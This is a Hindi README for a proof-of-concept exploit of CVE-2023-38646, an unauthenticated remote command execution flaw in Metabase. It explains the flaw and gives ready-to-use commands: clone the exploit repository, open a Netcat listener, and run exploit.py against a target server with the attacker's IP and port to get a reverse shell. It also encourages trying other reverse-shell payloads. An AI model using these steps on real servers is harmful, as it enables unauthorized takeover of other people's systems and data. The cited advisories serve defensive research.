
यह Metabase, एक ओपन-सोर्स बिजनेस इंटेलिजेंस और डेटा एनालिटिक्स टूल का शोषण करने के लिए एक Proof of Concept (PoC) स्क्रिप्ट है।
यह एक प्रूफ ऑफ कॉन्सेप्ट (PoC) स्क्रिप्ट है जो Metabase का शोषण करने के लिए है, जो एक ओपन-सोर्स बिजनेस इंटेलिजेंस और डेटा एनालिटिक्स टूल है। Metabase उपयोगकर्ताओं को अपने डेटा को विज़ुअलाइज़ और इंटरैक्ट करने की अनुमति देता है, जो इसे डेटा विश्लेषण के लिए एक शक्तिशाली प्लेटफॉर्म बनाता है।
यह भेद्यता, जिसे CVE-2023-38646 के रूप में नामित किया गया है, हमलावरों को बिना किसी प्रमाणीकरण की आवश्यकता के सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देती है। इस दोष का प्रभाव गंभीर था, क्योंकि इसने सर्वर के विशेषाधिकार स्तर पर सर्वर तक अनधिकृत पहुंच प्रदान की।
इस रिपॉजिटरी को क्लोन करें
git clone https://github.com/threatHNTR/CVE-2023-38646.git
रिपॉजिटरी में जाएं
cd CVE-2023-38646
स्क्रिप्ट चलाने से पहले, एक Netcat लिसनर सेट अप करें
nc -nlvp chosen-port
स्क्रिप्ट चलाएं
python3 exploit.py -u http://target-metabase-server -i your-ip-address -p chosen-port
शोषण: स्क्रिप्ट लक्ष्य Metabase सर्वर पर एक रिवर्स शेल भेजने का प्रयास करेगी। सफल होने पर, आपको अपनी मशीन पर एक शेल प्राप्त होगा। विभिन्न रिवर्स शेल आज़माने के लिए पेलोड बदलने में संकोच न करें।
GitHub एडवाइज़री: https://github.com/advisories/GHSA-jg32-8h6w-x7vg
Metabase एडवाइज़री: https://www.metabase.com/blog/security-advisory
Metabase GitHub: https://github.com/metabase/metabase
Assetnote ब्लॉग - Chaining our way to Pre-Auth RCE in Metabase: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/